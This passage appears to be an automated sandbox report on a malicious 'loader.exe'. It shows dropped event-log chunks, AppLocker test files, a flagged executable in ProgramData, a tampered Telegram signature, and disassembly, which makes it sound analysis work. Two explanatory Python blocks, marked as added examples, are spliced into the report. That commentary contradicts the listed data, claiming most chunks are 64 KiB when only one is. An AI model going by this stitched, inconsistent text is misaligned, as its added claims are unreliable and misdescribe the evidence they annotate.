                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.421206160086997
                                                      Encrypted:false
                                                      SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                      MD5:67CAD90771EBC0BD20736201D89C1586
                                                      SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                      SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                      SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                      Malicious:false
                                                      Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68120
                                                      Entropy (8bit):4.328257441883694
                                                      Encrypted:false
                                                      SSDEEP:384:2vFRpvFRjPoMonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1J:I1Xa1ZGg6UMWeBS
                                                      MD5:385958C4DE1460B10ADE787B88F287BB
                                                      SHA1:53D445D82D56E88398BE51DB74D7B137D339437A
                                                      SHA-256:E829A4D3759095E5C90AE29022415F41811A16D2F96BFC6C52CBDC2CD1F26B52
                                                      SHA-512:9E56B791A21E1F1925E35A482E0B4D55A134839429BEEA7DBC3FD404C3D51D809F71557A237D6A3ED75084C9DCC077D7F83FE6BFC643D2A950A22D99E6278CFC
                                                      Malicious:false
                                                      Preview:ElfChnk.................U.......U...................T@.9.....................................................................C......................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.........1..!.........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):68432
                                                      Entropy (8bit):0.4792387071841338
                                                      Encrypted:false
                                                      SSDEEP:96:XKNVaO80oz38yhO2KL8k2+KNVaO80oz38yhO2KL8k2:X8V7shhOP8V7shhO
                                                      MD5:B8934B8BBE34A8326E80B491BA0C9650
                                                      SHA1:29CDDED4284745F6245B1841D7F98C21599A9C97
                                                      SHA-256:E936E3543E19DFF2876484374FF02BAD0ADFC9F12BDBE6A978F318D80EF4438E
                                                      SHA-512:273C5FE6054A37519BD32675A8C5847E83120F7117DC56F08D92A3A839EDC58AE1F6EE0BDC2629BA4F8FE91165DB94379B25B036B6500977D074347903CCD747
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................P...(..,....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............%*D..!............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):88624
                                                      Entropy (8bit):4.477944989625847
                                                      Encrypted:false
                                                      SSDEEP:768:HICC0VdICC0VZdnLmLQXHmtpJnqiNHpzoQp9ICC0Vs+S:flb4MHmcsnJS
                                                      MD5:C09975CDC75DA98A35FEEB3D7CF858B1
                                                      SHA1:CC47A76A088F4852ABAC68C66CAA45DD2BC3E57D
                                                      SHA-256:2C4F04990DC93E92F059BD1F427C719CAB9E8736D1DD3F3F4B550DD6DA1BC099
                                                      SHA-512:0504A5C81D6FAF214CFAD5E9BCC7DADEB698CAA02D019186E081679BEC5D83E1575DF87DA47266BD39F6D6E49169EA66B1F92AAA99543EF6EAC23E169DDD2BB5
                                                      Malicious:false
                                                      Preview:ElfChnk.................n....................*...+..... ....................................................................J..................8...s...h...............`...=...................................................N...............................A....'..........w.......0.......................E...................................W...........).......M...3...:................................................................................................................'..........&...................**......n.........1..!.........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):86776
                                                      Entropy (8bit):3.8575388136202657
                                                      Encrypted:false
                                                      SSDEEP:1536:NBH8Sf2kel3f6C1JvuBH8Sf2kel3f6C1JvSPY3c9Nw0zEkkp:8
                                                      MD5:95C1080CF3D6D9F30C7146D0C444A1B4
                                                      SHA1:8E74A4FAF5466E357F7FB835650985629DC74C23
                                                      SHA-256:9798AA71ACD038FB21180DAD12E1D496A163FB9F0A3F6B80E063BA040777A1AD
                                                      SHA-512:CF9B373284A068EB86854F63C1126A38C855487D102536F028B8C27D71BE188BD8064F027FE38A6BC6660AA80D76A82A4E1E3EEA60B270369A37EE919FB41BEB
                                                      Malicious:false
                                                      Preview:ElfChnk.................y....................M...R..pLS{....................................................................9g.b............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y.......Z>...!.........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
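The files dropped by svchost.exe above all begin with the bytes ElfChnk, which is the magic of a Windows Event Log (EVTX) chunk; the report's file-type detector calls them "data" because a bare chunk lacks the ElfFile file header. An EVTX chunk is always 64 KiB, which is why most of them are exactly 65536 bytes, and the previews show the start of the first record ("**" is the 0x2a2a0000 record magic) followed by the BinXml of the Event/System/Provider elements. Because the report also flags an attempt to stop the EventLog service, an analyst recovering these chunks wants to know whether they are intact. The chunk header carries two CRC32 fields that make that check cheap. The following is an added example, not code from the page or from Joe Sandbox: it parses the chunk header, verifies both checksums, walks the record headers, and shows that a single flipped byte inside a record is caught. The chunk it operates on is constructed in `build_sample_chunk` (the BinXml body is a placeholder string and the timestamps are made up); the header layout and the checksum ranges follow the libevtx format documentation and are assumptions to verify against real chunks.

```python
import struct
import zlib
from datetime import datetime, timedelta, timezone

# EVTX chunk layout as documented by libevtx (assumed here; verify against real chunks).
CHUNK_MAGIC = b"ElfChnk\x00"
RECORD_MAGIC = b"\x2a\x2a\x00\x00"
CHUNK_SIZE = 0x10000           # one chunk is always 64 KiB
CHUNK_HEADER_SIZE = 0x200      # 128-byte header + string/template offset tables
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _crc32(buf):
    return zlib.crc32(buf) & 0xFFFFFFFF


def filetime_to_datetime(ft):
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_chunk(chunk):
    """Parse a chunk header and verify both CRC32 fields it carries."""
    if len(chunk) < CHUNK_HEADER_SIZE or chunk[:8] != CHUNK_MAGIC:
        raise ValueError("not an EVTX chunk: ElfChnk magic missing")
    (first_num, last_num, first_id, last_id, header_size,
     last_rec_off, free_off, records_crc) = struct.unpack_from("<QQQQIIII", chunk, 8)
    header_crc = struct.unpack_from("<I", chunk, 124)[0]
    # Header CRC covers bytes 0..119 and 128..511, i.e. everything but the CRC field itself.
    header_ok = _crc32(chunk[:120] + chunk[128:CHUNK_HEADER_SIZE]) == header_crc
    # Record CRC covers the record area from 0x200 up to the free-space offset.
    records_ok = free_off <= len(chunk) and _crc32(chunk[CHUNK_HEADER_SIZE:free_off]) == records_crc
    return {
        "first_record_number": first_num, "last_record_number": last_num,
        "first_record_id": first_id, "last_record_id": last_id,
        "header_size": header_size, "last_record_offset": last_rec_off,
        "free_space_offset": free_off,
        "header_crc_ok": header_ok, "records_crc_ok": records_ok,
    }


def iter_records(chunk, free_off):
    """Walk the record area; stop at the first record that fails its sanity checks."""
    off = CHUNK_HEADER_SIZE
    while off + 28 <= free_off:
        if chunk[off:off + 4] != RECORD_MAGIC:
            break
        size, rec_id, written = struct.unpack_from("<IQQ", chunk, off + 4)
        if size < 28 or off + size > free_off:
            break
        size_copy = struct.unpack_from("<I", chunk, off + size - 4)[0]  # trailing size copy
        yield {"offset": off, "size": size, "id": rec_id,
               "written": filetime_to_datetime(written), "size_ok": size_copy == size}
        off += size


def build_sample_chunk(record_ids,
                       first_written=datetime(2024, 10, 18, 7, 57, 33, tzinfo=timezone.utc),
                       payload=b"<constructed BinXml placeholder>"):
    """Constructed chunk for demonstration: real records carry BinXml, not this placeholder."""
    ft0 = int((first_written - FILETIME_EPOCH).total_seconds() * 10_000_000)
    records = bytearray()
    last_rec_off = CHUNK_HEADER_SIZE
    for i, rec_id in enumerate(record_ids):
        size = 28 + len(payload)                    # 24-byte header + data + 4-byte size copy
        last_rec_off = CHUNK_HEADER_SIZE + len(records)
        records += RECORD_MAGIC + struct.pack("<IQQ", size, rec_id, ft0 + i * 10_000_000)
        records += payload + struct.pack("<I", size)
    free_off = CHUNK_HEADER_SIZE + len(records)
    header = bytearray(CHUNK_HEADER_SIZE)
    header[:8] = CHUNK_MAGIC
    struct.pack_into("<QQQQIIII", header, 8, 1, len(record_ids), record_ids[0], record_ids[-1],
                     128, last_rec_off, free_off, _crc32(bytes(records)))
    struct.pack_into("<I", header, 124, _crc32(bytes(header[:120]) + bytes(header[128:])))
    return bytes(header) + bytes(records) + b"\x00" * (CHUNK_SIZE - free_off)


if __name__ == "__main__":
    chunk = build_sample_chunk([101, 102, 103])
    hdr = parse_chunk(chunk)
    print(hdr)
    for rec in iter_records(chunk, hdr["free_space_offset"]):
        print(rec)
    tampered = bytearray(chunk)
    tampered[CHUNK_HEADER_SIZE + 30] ^= 0xFF   # flip a byte inside the first record's data
    print("tampered record CRC ok:", parse_chunk(bytes(tampered))["records_crc_ok"])
```

On a real dropped file, read it in 64 KiB pieces and call `parse_chunk` on each piece; a header that passes its own CRC while the record CRC fails points at a chunk that was rewritten or truncated after the header was last updated, which is the case worth a closer look when the EventLog service was being stopped.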
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                       Joe Sandbox View:
                                                       • Filename: SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe, Detection: malicious
                                                       • Filename: Step 3 - Setup_Install.exe, Detection: malicious
                                                       • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exe, Detection: malicious
                                                       • Filename: eqkh9g37Yb.exe, Detection: malicious
                                                       • Filename: bBcZoComLl.exe, Detection: malicious
                                                       • Filename: file.exe, Detection: malicious
                                                       • Filename: dgiX55cHyU.exe, Detection: malicious
                                                       • Filename: gaber_mnr.ps1, Detection: malicious
                                                       • Filename: w0QdNGUNtd.exe, Detection: malicious
                                                       • Filename: SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.538154728899747
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:loader.exe
                                                      File size:5'502'728 bytes
                                                      MD5:cdabdc02374167ccd4938e9fe8c31789
                                                      SHA1:59028bd5da928a0aadf157c39ac2c9281dcc881d
                                                      SHA256:9161be21746469b9b3c653b81d7ca6639927e89ece780a4682a2059ba30e2793
                                                      SHA512:7e823f4bc54e96e1b4b3972068b1495426acb145bd9ddbfc7959fefca957d874db844a39bfd6225a97db31027ed226301f767e4d5ce708c8da4aad4e7ba11f61
                                                      SSDEEP:98304:wTjsUxLm7HrkZkwsrK8TrIVng9Hxw+4lJZlU0SY8j/42ULZKGDeSoMjWHpNXBN6:MjhWrkZkXzTrp9Hx8JZ9SY8zCw3SnjOo
                                                      TLSH:3446231B91DAC294D4928DBC3FA562D222B848C2D7474C177EF220EDF3469D92C9E4F6
                                                      File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........,S.....@..........@.............................PT...........`........................................
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x671214ED [Fri Oct 18 07:57:33 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:3b819c3dfb34bc24b00db0746b529d11
                                                      Signature Valid:false
                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                       Signature Validation Error:The digital signature of the object did not verify
                                                       Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the signature block is present but the file's Authenticode hash no longer matches the signed digest)
                                                       Not Before:29/07/2022 08:15:36
                                                       Not After:29/07/2025 08:15:36
                                                      Subject Chain
                                                      • E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
                                                      Version:3
                                                      Thumbprint MD5:D26432F60E2A3BBEB3537B78CB826828
                                                      Thumbprint SHA-1:71AB79E1C8FF155838C37A5299AE215C52BF6D1D
                                                      Thumbprint SHA-256:BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
                                                      Serial:7AE2B5021371F092A904B6FA
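The signature block above is the practitioner's clue: the PKCS#7 blob and its Telegram FZ-LLC certificate chain are intact (issuer, thumbprints and validity window all parse), yet verification fails with TRUST_E_BAD_DIGEST. That error is raised when the Authenticode hash computed over the file differs from the digest stored in the signed SpcIndirectDataContent, i.e. bytes that the signature covers were changed after signing, which is what happens when a signed binary is patched or repurposed. The following is an added example, not code from the page, from Joe Sandbox or from the sample: it implements the Authenticode hashing rule from Microsoft's "Windows Authenticode Portable Executable Signature Format" (hash the whole file except the CheckSum field, the Certificate Table data-directory entry and the certificate table itself) and shows which modifications move the digest. The PE it hashes is constructed by `build_sample_pe` (one .text section holding a RET, and a placeholder certificate table that is not a real PKCS#7 structure); it assumes the certificate table sits after the last section and that NumberOfRvaAndSizes covers the security directory.

```python
import hashlib
import struct

# Authenticode hashing (MS "Windows Authenticode PE Signature Format"): every byte of
# the file is hashed EXCEPT the CheckSum field, the Certificate Table directory entry
# and the certificate table itself. Layout assumptions: cert table follows the
# sections, and NumberOfRvaAndSizes >= 5 so the security directory entry exists.


def _pe_layout(data):
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32
        datadir = opt + 96
    elif magic == 0x20B:          # PE32+
        datadir = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    checksum_off = opt + 64
    secdir_off = datadir + 4 * 8  # IMAGE_DIRECTORY_ENTRY_SECURITY == 4
    cert_off, cert_size = struct.unpack_from("<II", data, secdir_off)  # file offset, not RVA
    sections = []
    sect_tbl = opt + opt_size
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_tbl + i * 40 + 16)
        if raw_size:
            sections.append((raw_ptr, raw_size))
    sections.sort()               # spec: hash sections in PointerToRawData order
    return checksum_off, secdir_off, size_of_headers, sections, cert_off, cert_size


def authenticode_ranges(data):
    """File byte ranges covered by the Authenticode digest, in hashing order."""
    checksum_off, secdir_off, size_of_headers, sections, cert_off, cert_size = _pe_layout(data)
    ranges = [(0, checksum_off),
              (checksum_off + 4, secdir_off),
              (secdir_off + 8, size_of_headers)]
    end = size_of_headers
    for ptr, size in sections:
        ranges.append((ptr, ptr + size))
        end = max(end, ptr + size)
    if cert_size:
        ranges.append((end, cert_off))                    # overlay before the cert table
        ranges.append((cert_off + cert_size, len(data)))  # anything after it
    else:
        ranges.append((end, len(data)))
    return [(a, b) for a, b in ranges if b > a]


def authenticode_hash(data, algorithm="sha256"):
    h = hashlib.new(algorithm)
    for start, stop in authenticode_ranges(data):
        h.update(data[start:stop])
    return h.hexdigest()


def build_sample_pe(cert_blob):
    """Constructed minimal PE32+: one .text section plus a certificate table whose
    body is cert_blob (a placeholder, not a real PKCS#7 SignedData)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", opt, 0,
                     0x20B, 14, 0, 0x200, 0, 0, 0x1000, 0x1000, 0x140000000,
                     0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x2000, 0x200, 0,
                     2, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    text = b"\xC3".ljust(0x200, b"\x00")                       # a single RET
    cert_off = 0x200 + len(text)
    win_cert = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
    struct.pack_into("<II", opt, 112 + 4 * 8, cert_off, len(win_cert))
    section = struct.pack("<8sIIIIIIHHI", b".text", 1, 0x1000, len(text), 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\x00\x00" + coff + opt + section).ljust(0x200, b"\x00")
    return bytes(headers + text + win_cert)


def tamper_demo():
    """Which edits change the covered digest (and would yield TRUST_E_BAD_DIGEST)."""
    clean = build_sample_pe(b"\x30\x82" + b"\xAA" * 62)
    base = authenticode_hash(clean)
    checksum_off = _pe_layout(clean)[0]
    in_text = bytearray(clean); in_text[0x200] ^= 0xFF           # patch code
    in_cert = bytearray(clean); in_cert[-1] ^= 0xFF              # patch signature blob
    in_checksum = bytearray(clean); struct.pack_into("<I", in_checksum, checksum_off, 0xDEADBEEF)
    return {
        "code_patch_changes_digest": authenticode_hash(bytes(in_text)) != base,
        "cert_patch_changes_digest": authenticode_hash(bytes(in_cert)) != base,
        "checksum_patch_changes_digest": authenticode_hash(bytes(in_checksum)) != base,
    }


if __name__ == "__main__":
    print(tamper_demo())
```

The two "False" results are the caveat: bytes inside the certificate table are not covered by the digest at all (the root of CVE-2013-3900, where data smuggled into that table kept a signature valid), so a valid signature says nothing about what the table itself contains, and a file can be reclassified by a trivial edit to a covered byte without touching the certificate chain, exactly the combination the report shows here.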
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00009ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007FB838FBC82Fh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00009EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FB838FBC850h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007FB838FBC84Bh
                                                      dec esp
                                                      mov esi, dword ptr [0000D649h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FB838FBC827h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007FB838FBC809h
                                                      dec eax
                                                      mov edi, dword ptr [00009E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FB838FBC82Eh
                                                      mov ecx, 0000001Fh
                                                      call 00007FB838FC5EC4h
                                                      jmp 00007FB838FBC849h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007FB838FBC82Bh
                                                      mov byte ptr [0053BE91h], 00000001h
                                                      jmp 00007FB838FBC83Bh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00009E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00009E7Bh]
                                                      call 00007FB838FC5EBBh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FB838FBC83Bh
                                                      dec eax
                                                      mov ecx, dword ptr [00009E50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe4d8 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x543000 | 0x350 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x540000 | 0x1a4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x53cc00 | 0x2b08 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x544000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb0a0 | 0x28 | .rdata
